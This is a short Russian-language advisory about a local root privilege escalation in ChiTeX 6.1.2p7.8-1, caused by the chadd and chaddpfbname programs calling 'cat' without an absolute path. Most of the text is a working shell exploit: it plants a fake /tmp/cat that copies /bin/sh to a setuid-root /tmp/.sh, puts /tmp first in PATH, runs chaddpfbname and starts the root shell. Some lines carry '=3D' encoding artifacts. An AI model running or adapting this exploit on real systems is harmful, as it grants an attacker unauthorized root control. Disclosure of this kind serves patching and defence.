Уязвимость обнаружена в ChiTeX. Локальный пользователь может получить root привилегии на системе.
Программное обеспечение выполняет системный запрос, ссылающийся на команду
cat, не используя явный путь к cat утилите. В результате, локальный пользователь может создать программу с именем
cat, которая будет расположена в каталоге в системном пути и затем вызвать ChiTeX, который выполнить код пользователя с root привилегиями. Уязвимые программы - chadd и chaddpfbname. Пример:
#!/bin/sh
echo 'owned' > 'psfontsmap@'
export psfontsmap=3D/tmp/owned
echo "/bin/cp /bin/sh /tmp/.sh" > /tmp/cat
echo "/bin/chmod 4755 /tmp/.sh" >> /tmp/cat
chmod +x /tmp/cat
cd /tmp
export PATH=3D"/tmp:$PATH"
/usr/local/bin/chaddpfbname
/tmp/.sh -c id
/tmp/.sh
Уязвимость обнаружена в ChiTex 6.1.2p7.8-1.